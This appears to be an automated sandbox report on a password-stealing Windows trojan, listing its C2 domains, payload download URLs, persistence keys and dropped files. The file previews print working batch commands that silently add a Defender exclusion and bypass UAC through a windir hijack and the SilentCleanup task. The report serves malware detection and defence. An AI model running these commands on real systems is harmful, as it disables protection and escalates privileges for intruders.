              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 429553 Sample: V8IB839cvz.exe Startdate: 04/06/2021 Architecture: WINDOWS Score: 100 35 nothinglike.ac.ug 2->35 37 brudfascaqezd.ac.ug 2->37 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 4 other signatures 2->57 9 V8IB839cvz.exe 1 23 2->9         started        14 Xypgtv.exe 13 2->14         started        16 Xypgtv.exe 13 2->16         started        signatures3 process4 dnsIp5 43 cdn.discordapp.com 162.159.130.233, 443, 49729, 49730 CLOUDFLARENETUS United States 9->43 33 C:\Users\Public\Xypgtv\Xypgtv.exe, PE32 9->33 dropped 59 Detected unpacking (overwrites its own PE header) 9->59 61 Contains functionality to steal Chrome passwords or cookies 9->61 63 Contains functionality to steal Firefox passwords or cookies 9->63 65 Delayed program exit found 9->65 18 V8IB839cvz.exe 1 9->18         started        21 cmd.exe 1 9->21         started        45 162.159.134.233, 443, 49755 CLOUDFLARENETUS United States 14->45 47 192.168.2.1 unknown unknown 14->47 67 Multi AV Scanner detection for dropped file 14->67 69 Machine Learning detection for dropped file 14->69 71 Injects a PE file into a foreign processes 14->71 23 Xypgtv.exe 14->23         started        49 162.159.133.233, 443, 49759 CLOUDFLARENETUS United States 16->49 25 Xypgtv.exe 16->25         started        file6 signatures7 process8 dnsIp9 39 nothinglike.ac.ug 79.134.225.25, 49745, 49748, 49751 FINK-TELECOM-SERVICESCH Switzerland 18->39 41 brudfascaqezd.ac.ug 18->41 27 cmd.exe 1 21->27         started        29 conhost.exe 21->29         started        process10 process11 31 conhost.exe 27->31         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              V8IB839cvz.exe41%ReversingLabsWin32.Spyware.Noon
              V8IB839cvz.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Xypgtv\Xypgtv.exe100%Joe Sandbox ML
              C:\Users\Public\Xypgtv\Xypgtv.exe41%ReversingLabsWin32.Spyware.Noon

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              17.2.Xypgtv.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              15.2.Xypgtv.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              2.2.V8IB839cvz.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              nothinglike.ac.ug0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cdn.discordapp.com
              		162.159.130.233
              		truefalse
                		high
                nothinglike.ac.ug
                		79.134.225.25
                		truetrue
                  		unknown
                  brudfascaqezd.ac.ug
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    nothinglike.ac.ugtrue
                    • Avira URL Cloud: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    79.134.225.25
                    		nothinglike.ac.ugSwitzerland
                    		6775FINK-TELECOM-SERVICESCHtrue
                    162.159.130.233
                    		cdn.discordapp.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    162.159.133.233
                    		unknownUnited States
                    		13335CLOUDFLARENETUSfalse
                    162.159.134.233
                    		unknownUnited States
                    		13335CLOUDFLARENETUSfalse

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:429553
                    Start date:04.06.2021
                    Start time:09:39:07
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:V8IB839cvz.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@16/9@96/5
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 32.9% (good quality ratio 30.6%)
                    • Quality average: 78.7%
                    • Quality standard deviation: 28%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.43.193.48, 13.88.21.125, 40.88.32.150, 104.42.151.234, 52.147.198.201, 20.50.102.62, 52.155.217.156, 205.185.216.42, 205.185.216.10, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
                    • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/429553/sample/V8IB839cvz.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:39:54API Interceptor3x Sleep call for process: V8IB839cvz.exe modified
                    09:40:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
                    09:40:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
                    09:40:24API Interceptor4x Sleep call for process: Xypgtv.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    79.134.225.25afp-00553223.pdf.exeGet hashmaliciousBrowse
                      To1sRo1E8P.exeGet hashmaliciousBrowse
                        BhTxt5BUvy.exeGet hashmaliciousBrowse
                          5H957qLghX.exeGet hashmaliciousBrowse
                            yQY73z6zaP.exeGet hashmaliciousBrowse
                              Delivery pdf.exeGet hashmaliciousBrowse
                                fnfqzfwC44.exeGet hashmaliciousBrowse
                                  Form pdf.exeGet hashmaliciousBrowse
                                    Purchase Order3.scr.exeGet hashmaliciousBrowse
                                      PURCHASE_ORDER2.scr.exeGet hashmaliciousBrowse
                                        M1agnNpcj2.exeGet hashmaliciousBrowse
                                          162.159.130.233order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                          Order Confirmation.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                          cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                          SkKcQaHEB8.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                          P20200107.DOCGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                          FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                          G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                          Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                          2021 RFQ Products Required.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                          Company Reference1.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                          PAY SLIP.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                          part1.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          cdn.discordapp.comSOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          68avRiNoDd.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          Invoice.05192921.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          ItQw2Ud9WL.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Kv6wO46d8e.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          FOB offer_1164087223_I0133P2100363812.pdf (1).exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          SecuriteInfo.com.Troj.Kryptik-TR.10844.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          SecuriteInfo.com.Troj.Kryptik-TR.30930.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          Payment Invoice _ Purchase Invoice Mar 2021.docmGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.29692.rtfGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          SecuriteInfo.com.W32.AIDetect.malware2.9276.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          tes.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          YH6Zy2Q5e2.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          New order 201534.docGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          003 SOA.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          eBay-invoice-2195921.vbsGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          nothinglike.ac.ug8B1C960881FC789460B5B274ABD43BADDB1C92E1A942D.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          To1sRo1E8P.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          wNgiGmsOwT.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          BhTxt5BUvy.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          5H957qLghX.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          yQY73z6zaP.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          h1gMAKBj8d.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          2df27f1a3505dbd0995188d49c253f5bc53c0e994954c.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          1AQz4ua1TU.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          fnfqzfwC44.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          UNiOOhIN3e.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          bDbA5Bf1k2.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          mDxyEfHSMs.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          z3LPr7pOcN.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          OOQ10YZ15n.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          xytEWWD2QN.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          itqFYYnm5j.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          e7zQwqIDCO.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          eTDAg77Nif.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          hG8XQh9hMy.exeGet hashmaliciousBrowse
                                          • 185.140.53.149

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          CLOUDFLARENETUSAW94CUMB58.exeGet hashmaliciousBrowse
                                          • 172.67.181.37
                                          new_fax_message.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          TT Swif_66E3563653553_PDF_.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          IMG_15_60_103_681.xlsxGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          INVOICE SC1289.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Payment Slip.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          PO-8372929.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          v1RXFMUMfIXWvDX.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exeGet hashmaliciousBrowse
                                          • 172.67.134.204
                                          Secured-Message_7634-7.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
                                          • 172.67.206.72
                                          _Vm064855583.HtMGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SOA #093732.exeGet hashmaliciousBrowse
                                          • 172.67.130.122
                                          0900009000000000.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          _.htmlGet hashmaliciousBrowse
                                          • 104.18.10.207
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          1.dllGet hashmaliciousBrowse
                                          • 104.20.185.68
                                          MT103.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          CLOUDFLARENETUSAW94CUMB58.exeGet hashmaliciousBrowse
                                          • 172.67.181.37
                                          new_fax_message.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          TT Swif_66E3563653553_PDF_.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          IMG_15_60_103_681.xlsxGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          INVOICE SC1289.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Payment Slip.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          PO-8372929.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          v1RXFMUMfIXWvDX.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exeGet hashmaliciousBrowse
                                          • 172.67.134.204
                                          Secured-Message_7634-7.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
                                          • 172.67.206.72
                                          _Vm064855583.HtMGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SOA #093732.exeGet hashmaliciousBrowse
                                          • 172.67.130.122
                                          0900009000000000.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          _.htmlGet hashmaliciousBrowse
                                          • 104.18.10.207
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          1.dllGet hashmaliciousBrowse
                                          • 104.20.185.68
                                          MT103.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          FINK-TELECOM-SERVICESCHA2PlnLyOA7.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          PDF 209467_9377363745_378341152.exeGet hashmaliciousBrowse
                                          • 79.134.225.11
                                          v4nJnRl1gt.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          Invoice#282730.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          Urban Receipt.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          PO_20210.EXEGet hashmaliciousBrowse
                                          • 79.134.225.17
                                          SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          LOT_20210526.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          rf1K94mmmC.exeGet hashmaliciousBrowse
                                          • 79.134.225.17
                                          Outward Remittancepdf.exeGet hashmaliciousBrowse
                                          • 79.134.225.96
                                          afp-00553223.pdf.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          Q2MAUt4mRO.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          4fn66P5vkl.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          P_O 00041221.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          LOT_20210526.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          Z5CoLMcXk1.exeGet hashmaliciousBrowse
                                          • 79.134.225.69
                                          fUt23uSFwh.exeGet hashmaliciousBrowse
                                          • 79.134.225.18
                                          rpsmtJslZb.vbsGet hashmaliciousBrowse
                                          • 79.134.225.10
                                          https___cdn-111.anonfiles.com_heCeW9x6u7_3be78282-1622068029_PO_20880538.exeGet hashmaliciousBrowse
                                          • 79.134.225.7
                                          PO# JNE81H10-4 SOLSITIGES REQUOTATION FOR PURCHASE - H#80-281.exeGet hashmaliciousBrowse
                                          • 79.134.225.5

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          37f463bf4616ecd445d4a1937da06e196qpuabiBHa.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Invoice.xlsmGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Prudential Investment Services.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          N1LUjx76rV.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          0izHwHXyfm.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          gtJl8IPauk.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          HUa0EaTZco.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Xerox scan.htmlGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          sample-20200604.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          sample-20200604.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          #Ud83d#Udcde_Message_Received_05_19_21.htm.htmGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          JC0KUeH450.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          oNd23tLLxr.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Donation Receipt 36561536.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\Public\KDECO.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):155
                                          Entropy (8bit):4.687076340713226
                                          Encrypted:false
                                          SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                          MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                          SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                          SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                          SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                          C:\Users\Public\Trast.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):34
                                          Entropy (8bit):4.314972767530033
                                          Encrypted:false
                                          SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                          MD5:4068C9F69FCD8A171C67F81D4A952A54
                                          SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                          SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                          SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: start /min C:\Users\Public\UKO.bat
                                          C:\Users\Public\UKO.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):250
                                          Entropy (8bit):4.865356627324657
                                          Encrypted:false
                                          SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                          MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                          SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                          SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                          SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                          Malicious:false
                                          Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                          C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):690178
                                          Entropy (8bit):6.950419723768229
                                          Encrypted:false
                                          SSDEEP:12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikh4AOpbAF++n/tq:4sjhyZn4VuIMz8AAbAl/tq
                                          MD5:10D42F55D89B6FD42404E470E68F1996
                                          SHA1:3B9787BBFAAE456FE082DB8E2E61C70C5FB45328
                                          SHA-256:B84A345EFDDFA5A852C3E3C5C2C97DAB1A6F4643906D80C0C8CAFA1E25247326
                                          SHA-512:13403037FADBCA2F2DF76946D21EED91AFF9418A24ED1CE87C667447C352CD9EC50CDBFDA9D64EE51FBD879FBAB3610DAFBB12D3272332B16BCD8736395B31CE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 41%
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................."...........................`...i...........................P......................................................CODE....l........................... ..`DATA................................@...BSS.....q................................idata...".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc...i...`...j..................@..P.rsrc................v..............@..P............. ......................@..P........................................................................................................................................
                                          C:\Users\Public\nest
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8
                                          Entropy (8bit):3.0
                                          Encrypted:false
                                          SSDEEP:3:8vn:8vn
                                          MD5:0A666A12354EAE791661C1CE159A69AC
                                          SHA1:E7C7371C04C376BD74D0CF69C6A2360011D140BA
                                          SHA-256:A87D5B8EF1668068D22B2A226BD3C9FCBBDF554750D18319EF13B746D38B74CF
                                          SHA-512:6BEE681EDF46654419CD8B943AD46A7D8257B41D3486D2C0299AC98FEFAC3B8E598243C16E9060F26BFBCA2EFEA53794692FE33EBEC0480E576187DC9552A445
                                          Malicious:false
                                          Preview: Xypgtv..
                                          C:\Users\Public\vtgpyX.url
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Xypgtv\\Xypgtv.exe">), ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):83
                                          Entropy (8bit):4.9179828413523765
                                          Encrypted:false
                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55+MT+oRTL4bsGKd6ov:HRYFVmTWDySomsbDv
                                          MD5:719E8AB2AA893E297808AC73867E8C62
                                          SHA1:BA519ED8B0C50F2A928BAAACC2E7373710A1EB51
                                          SHA-256:DDE2E95AEDC7BD872AAFCF17FB3A3D69546044EF07CBD79317EDD2038826086A
